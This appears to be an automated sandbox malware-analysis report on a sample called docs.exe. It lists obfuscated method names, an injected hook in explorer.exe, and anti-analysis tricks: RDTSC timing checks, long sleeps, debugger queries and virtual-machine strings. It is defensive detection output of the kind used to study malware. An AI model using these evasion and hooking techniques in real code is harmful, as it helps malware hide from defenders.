          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, sU5tktntM79GAr8EnK.cs | High entropy of concatenated method names: 'IxjEJpnk9D', 'zgcE3Zw03y', 'LA2E4a2vE9', 'xAEE6IJglF', 'ApHEMlGyZE', 'qPnE8nqrHL', 'uK7Ee5sg6n', 'WrXEZbLhvp', 'kMcEYoD4HR', 'uTZEsTDxaH'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, PoDc7m9h94cvcn0ZZT.cs | High entropy of concatenated method names: 'V3U8JSkWAp', 'a4g84Mbqan', 'a6b8MtD2Nv', 'G4NMF4v5DR', 'jRnMz8Y1Gt', 'x9n81igeAP', 'dSp80dMhog', 'zhg8OWZeP9', 'cT38iojRfB', 'pwH8dx43nJ'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, vFnIq0XyLTVKbyTxHh.cs | High entropy of concatenated method names: 'OO49aPoiMdkk6EJwrBN', 'KXq1Z6oc8CZb9RIfiBO', 'o1UMELJsxu', 'lFUMh0SpBO', 'UKiMvHfbmx', 'ck5K7ToEk7gjam7vCAn', 'PfDXVdowmlcYpfUpZsL'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, G756Xyz9v7pHqk8kgU.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D1AhKjQO4n', 'fs6hSTg3qR', 'Vm0hyCfL4Y', 'wEdhIikxkG', 'YynhE0wnWy', 'uHHhhpOudh', 'fddhv5PCNA'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, VWcrTg4qwlTNKDbRFr.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MX5OrbWC0W', 'rhVOFt42Al', 'eTuOzvKAbN', 'KfCi1YelNG', 'n0Vi0jerov', 'GUxiOjWN8f', 'wwTiiudnJg', 'dmYyoP4prIsX42KIOcj'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, af84IndmRovVmUbgp4.cs | High entropy of concatenated method names: 'fYo08SRLTv', 'Jud0eq6gGe', 'Y4k0YYSmpp', 'AMu0sQ02LS', 'pyd0SBy9Pw', 'PrZ0yTjgk2', 'IKUJh8ICV2PKML3hZS', 'sJQLJ9qhfJrY8S1L79', 'YMB007nipX', 'WPQ0ik4mie'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, qXH2vA5WHQSuKjXZcj.cs | High entropy of concatenated method names: 'l8pInyRaIh', 'O44IFoQAbZ', 'PYlE1fCg5u', 'RMSE0rg8ED', 'wQrIQE9lE0', 'lMLIa7dv0X', 'lnbIAdHehP', 'ao5IxiccZk', 'gjcIqkFdMS', 'VKdICdxRM0'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, LPwarZWTjgk2MRtSIP.cs | High entropy of concatenated method names: 'VqJMpsty79', 'YZrM35CrMK', 'LJFM6LrvMi', 'zktM8Sm4Tg', 'fRWMeajOTO', 'zYn6Dut7VM', 'UXs65ppXy5', 'uNO6gJWbO9', 'AUH6nAEdpe', 'jJT6r2GiVq'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, b2LSPYUHa0fFByydBy.cs | High entropy of concatenated method names: 'TxT6bMGgSX', 'YnX6jUikFA', 'Eac4kMsVQX', 'CBs4BxrwV4', 'u1d4mK3uSn', 'Lpi4LfYYdg', 'fc449mn6jj', 'QTp4w4XyBe', 'ACa42RxFhB', 'wnd4HVH5ep'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, W0CO6nx2lbf45N3dZB.cs | High entropy of concatenated method names: 'FyeSHy7wOY', 'PPnSaJ1JJc', 'PmkSx4D3VE', 'ADDSq7VDix', 'oygSXmHHB8', 'DrbSkbtbqM', 'mxeSBtV43o', 'EbRSm9wnxa', 'QVtSLfYees', 'F2dS95MGMW'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, gvZomwe6c5cc4pjo9P.cs | High entropy of concatenated method names: 'dTvipCo47p', 'XU7iJM33cp', 'Grbi3tdaMX', 'IyFi4dpTkd', 'HZFi6tHkmI', 'IRAiMVjBI6', 'P7Mi860EgN', 'fQUieBZaJZ', 'HHiiZdn7Gu', 'A88iYreIIk'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, QusdL9AWQuEDZLo2qk.cs | High entropy of concatenated method names: 'DgHKu8g4if', 'gJQKtp4MEd', 'eEQKWTZr40', 'hP7KXtcaO8', 'vSgKBKc5Y0', 'z5mKmnxyIJ', 'fDaK9bqd18', 'guLKw57hmH', 'Kx1KH893xF', 'P0OKQtgFCy'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, C382v4CSP1CfdGk3jL.cs | High entropy of concatenated method names: 'ToString', 'ShLyQDWB75', 'kucyXA7cLE', 'KK6ykwWp79', 'gxRyBREn2w', 'TNhym7Uks1', 'PiJyLa7jSa', 'mTPy95KASi', 'XYIywWJQkX', 'pL7y2uf49l'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, xOJxjE3K2SamCagQoj.cs | High entropy of concatenated method names: 'Dispose', 'vPS0rXSqae', 'ECbOXPH9c4', 'JNdnnpC6YC', 'DhU0F5tktt', 'j790zGAr8E', 'ProcessDialogKey', 'XK9O1BA7Yf', 'cHKO0ADt4q', 'TvGOOHKABq'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, NKABqoFswAiiVih8OX.cs | High entropy of concatenated method names: 'SFph0TKJgS', 'fBbhiJeAdS', 'oMFhdd7P1K', 'yLXhJJdKHO', 'GVSh3QUaEt', 'upkh62rbwp', 'JUyhMe40Fc', 'CvvEgBd72s', 'fe0EnSXsXM', 'r2OErvta3G'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, WcvWMqPxe6glMxDFWx.cs | High entropy of concatenated method names: 'iKRIYnvWGk', 'sH8IsAX9Zt', 'ToString', 'a0RIJmDKij', 'Cw4I3rJdhv', 'qjvI4n4j7u', 'GljI6ipwLj', 'UVvIMjVErL', 'dGwI80qXCR', 'xWKIeTWRNM'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, uSRLTvumudq6gGeKK7.cs | High entropy of concatenated method names: 'tHH3xKyoEn', 'wVM3qeFfto', 'MT63CTSNBS', 'rRE3PqcZOI', 'IAt3DjcHA3', 'GiK352som4', 'bTV3gHHbrU', 'FD13nNawND', 'OsE3ryFAIO', 'bpQ3FNKhvZ'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, LBA7YfrOHKADt4qPvG.cs | High entropy of concatenated method names: 'zjkEW3rcyB', 'wl5EXEeuHH', 'TSMEkAPVnC', 'QTaEBxrcyh', 'MgeExtGkXA', 'wwiEmIeH4I', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, aqVL7cOYT5UyxcIhT9.cs | High entropy of concatenated method names: 'VlcNITTaM', 'P0qGaSCiS', 'wMOT4WKl9', 'II1j4h3P7', 'Apxtg2a0r', 'sUoUWtidq', 'xJC3XUdxdof3RiglQw', 'zrPYEvRjV0CmWOhGjB', 'gKFEZ4oWw', 'SDlvDmYoo'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, IOx5x401yRp3CI6OJ3d.cs | High entropy of concatenated method names: 'M78hlYP6Y6', 'pfRhV5owIT', 'JfShNyPEUX', 'xqOhGdrAHx', 'qqehbF3nkK', 'klghT0d7pp', 'Dh3hjLN0kp', 'rfwhuEs08W', 'QkbhtLNbVL', 'EWDhUmTHlZ'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, VlBf5Ft4kYSmppGMuQ.cs | High entropy of concatenated method names: 'aZX4G9ZEYh', 'yqu4TCwedR', 'aNo4uXFpKK', 'h3s4tRPnc3', 'D8x4SNAbvR', 'gpc4yM2x9T', 'wr14IbVYvv', 'Hj04Ew0y6q', 'x6F4hwJtch', 'RmV4vv6TV6'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, LDZDcM2Nou0J0HoJor.cs | High entropy of concatenated method names: 'GJm8ltcUyg', 'Jaw8VtiUZK', 'FYM8N9BOCb', 'MsM8GU1b0K', 'i3a8bOVUSI', 'IZn8TFT8bX', 'fTB8jMVS28', 'VIO8uoLSx3', 'hZp8tkQEoS', 'YVA8UEcHnw'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, sU5tktntM79GAr8EnK.cs | High entropy of concatenated method names: 'IxjEJpnk9D', 'zgcE3Zw03y', 'LA2E4a2vE9', 'xAEE6IJglF', 'ApHEMlGyZE', 'qPnE8nqrHL', 'uK7Ee5sg6n', 'WrXEZbLhvp', 'kMcEYoD4HR', 'uTZEsTDxaH'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, PoDc7m9h94cvcn0ZZT.cs | High entropy of concatenated method names: 'V3U8JSkWAp', 'a4g84Mbqan', 'a6b8MtD2Nv', 'G4NMF4v5DR', 'jRnMz8Y1Gt', 'x9n81igeAP', 'dSp80dMhog', 'zhg8OWZeP9', 'cT38iojRfB', 'pwH8dx43nJ'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, vFnIq0XyLTVKbyTxHh.cs | High entropy of concatenated method names: 'OO49aPoiMdkk6EJwrBN', 'KXq1Z6oc8CZb9RIfiBO', 'o1UMELJsxu', 'lFUMh0SpBO', 'UKiMvHfbmx', 'ck5K7ToEk7gjam7vCAn', 'PfDXVdowmlcYpfUpZsL'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, G756Xyz9v7pHqk8kgU.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D1AhKjQO4n', 'fs6hSTg3qR', 'Vm0hyCfL4Y', 'wEdhIikxkG', 'YynhE0wnWy', 'uHHhhpOudh', 'fddhv5PCNA'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, VWcrTg4qwlTNKDbRFr.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MX5OrbWC0W', 'rhVOFt42Al', 'eTuOzvKAbN', 'KfCi1YelNG', 'n0Vi0jerov', 'GUxiOjWN8f', 'wwTiiudnJg', 'dmYyoP4prIsX42KIOcj'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, af84IndmRovVmUbgp4.cs | High entropy of concatenated method names: 'fYo08SRLTv', 'Jud0eq6gGe', 'Y4k0YYSmpp', 'AMu0sQ02LS', 'pyd0SBy9Pw', 'PrZ0yTjgk2', 'IKUJh8ICV2PKML3hZS', 'sJQLJ9qhfJrY8S1L79', 'YMB007nipX', 'WPQ0ik4mie'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, qXH2vA5WHQSuKjXZcj.cs | High entropy of concatenated method names: 'l8pInyRaIh', 'O44IFoQAbZ', 'PYlE1fCg5u', 'RMSE0rg8ED', 'wQrIQE9lE0', 'lMLIa7dv0X', 'lnbIAdHehP', 'ao5IxiccZk', 'gjcIqkFdMS', 'VKdICdxRM0'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, LPwarZWTjgk2MRtSIP.cs | High entropy of concatenated method names: 'VqJMpsty79', 'YZrM35CrMK', 'LJFM6LrvMi', 'zktM8Sm4Tg', 'fRWMeajOTO', 'zYn6Dut7VM', 'UXs65ppXy5', 'uNO6gJWbO9', 'AUH6nAEdpe', 'jJT6r2GiVq'
          Source: 0.2.docs.exe.7370000.4.raw.unpack, b2LSPYUHa0fFByydBy.cs | High entropy of concatenated method names: 'TxT6bMGgSX', 'YnX6jUikFA', 'Eac4kMsVQX', 'CBs4BxrwV4', 'u1d4mK3uSn', 'Lpi4LfYYdg', 'fc449mn6jj', 'QTp4w4XyBe', 'ACa42RxFhB', 'wnd4HVH5ep'

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xED
          Source: C:\Users\user\Desktop\docs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match | File source: Process Memory Space: docs.exe PID: 2672, type: MEMORYSTR
          Source: C:\Users\user\Desktop\docs.exe | API/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Users\user\Desktop\docs.exe | API/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Users\user\Desktop\docs.exe | API/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Users\user\Desktop\docs.exe | API/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Users\user\Desktop\docs.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
          Source: C:\Users\user\Desktop\docs.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\wscript.exe | API/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Windows\SysWOW64\wscript.exe | API/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Windows\SysWOW64\wscript.exe | API/Special instruction interceptor: Address: 7FFDB442D944
          Source: C:\Windows\SysWOW64\wscript.exe | API/Special instruction interceptor: Address: 7FFDB442D504
          Source: C:\Windows\SysWOW64\wscript.exe | API/Special instruction interceptor: Address: 7FFDB442D544
          Source: C:\Windows\SysWOW64\wscript.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\wscript.exe | API/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Windows\SysWOW64\wscript.exe | API/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Windows\SysWOW64\wscript.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
          Source: C:\Users\user\Desktop\docs.exe | RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\docs.exe | RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: First address: 2A09904 second address: 2A0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: First address: 2A09B7E second address: 2A09B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\docs.exe | Memory allocated: 13B0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\docs.exe | Memory allocated: 2FB0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\docs.exe | Memory allocated: 1580000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\docs.exe | Memory allocated: 7E30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\docs.exe | Memory allocated: 8E30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\docs.exe | Memory allocated: 8FE0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\docs.exe | Memory allocated: 9FE0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\docs.exe | Memory allocated: A340000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\docs.exe | Memory allocated: B340000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\docs.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6056
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3662
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 9827
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 888
          Source: C:\Windows\SysWOW64\wscript.exe | Window / User API: threadDelayed 9840
          Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_6-13823
          Source: C:\Users\user\Desktop\docs.exe | API coverage: 1.6 %
          Source: C:\Windows\SysWOW64\wscript.exe | API coverage: 1.5 %
          Source: C:\Users\user\Desktop\docs.exe TID: 2792 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160 | Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2144 | Thread sleep count: 124 > 30
          Source: C:\Windows\explorer.exe TID: 2144 | Thread sleep time: -248000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2144 | Thread sleep count: 9827 > 30
          Source: C:\Windows\explorer.exe TID: 2144 | Thread sleep time: -19654000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 5160 | Thread sleep count: 132 > 30
          Source: C:\Windows\SysWOW64\wscript.exe TID: 5160 | Thread sleep time: -264000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 5160 | Thread sleep count: 9840 > 30
          Source: C:\Windows\SysWOW64\wscript.exe TID: 5160 | Thread sleep time: -19680000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005923CE GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose
          Source: explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
          Source: explorer.exe, 00000006.00000002.4603707608.00000000097F3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWws
          Source: explorer.exe, 00000006.00000002.4603707608.00000000098E3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
          Source: explorer.exe, 00000006.00000000.2157815827.0000000009605000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
          Source: explorer.exe, 00000006.00000000.2150991767.0000000000D99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2157815827.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000978C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000000.2150991767.0000000000D99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
          Source: explorer.exe, 00000006.00000000.2163588037.000000000C24C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000006.00000002.4603707608.00000000098E3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
          Source: explorer.exe, 00000006.00000000.2150991767.0000000000D99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000002.4603707608.00000000098E3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 00000006.00000000.2150991767.0000000000D99000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\docs.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\docs.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0040ACF0 LdrLoadDll
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F3C0F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F820F0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F3A0E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_01000115 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FC60E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F480E9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FC20DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F380A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FD80A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_01014164 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F4208A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F6C073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F42050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FC6050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_010061C3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FD6030 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F3A020 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F3C020 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E016 mov eax, dword ptr fs:[00000030h]5_2_00F5E016
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E016 mov eax, dword ptr fs:[00000030h]5_2_00F5E016
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E016 mov eax, dword ptr fs:[00000030h]5_2_00F5E016
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E016 mov eax, dword ptr fs:[00000030h]5_2_00F5E016
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010161E5 mov eax, dword ptr fs:[00000030h]5_2_010161E5
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC4000 mov ecx, dword ptr fs:[00000030h]5_2_00FC4000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE2000 mov eax, dword ptr fs:[00000030h]5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F701F8 mov eax, dword ptr fs:[00000030h]5_2_00F701F8
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE1D0 mov eax, dword ptr fs:[00000030h]5_2_00FBE1D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE1D0 mov eax, dword ptr fs:[00000030h]5_2_00FBE1D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE1D0 mov ecx, dword ptr fs:[00000030h]5_2_00FBE1D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE1D0 mov eax, dword ptr fs:[00000030h]5_2_00FBE1D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE1D0 mov eax, dword ptr fs:[00000030h]5_2_00FBE1D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC019F mov eax, dword ptr fs:[00000030h]5_2_00FC019F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC019F mov eax, dword ptr fs:[00000030h]5_2_00FC019F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC019F mov eax, dword ptr fs:[00000030h]5_2_00FC019F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC019F mov eax, dword ptr fs:[00000030h]5_2_00FC019F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3A197 mov eax, dword ptr fs:[00000030h]5_2_00F3A197
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3A197 mov eax, dword ptr fs:[00000030h]5_2_00F3A197
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3A197 mov eax, dword ptr fs:[00000030h]5_2_00F3A197
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFC188 mov eax, dword ptr fs:[00000030h]5_2_00FFC188
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFC188 mov eax, dword ptr fs:[00000030h]5_2_00FFC188
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F80185 mov eax, dword ptr fs:[00000030h]5_2_00F80185
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE4180 mov eax, dword ptr fs:[00000030h]5_2_00FE4180
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE4180 mov eax, dword ptr fs:[00000030h]5_2_00FE4180
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46154 mov eax, dword ptr fs:[00000030h]5_2_00F46154
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46154 mov eax, dword ptr fs:[00000030h]5_2_00F46154
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3C156 mov eax, dword ptr fs:[00000030h]5_2_00F3C156
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD8158 mov eax, dword ptr fs:[00000030h]5_2_00FD8158
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010060B8 mov eax, dword ptr fs:[00000030h]5_2_010060B8
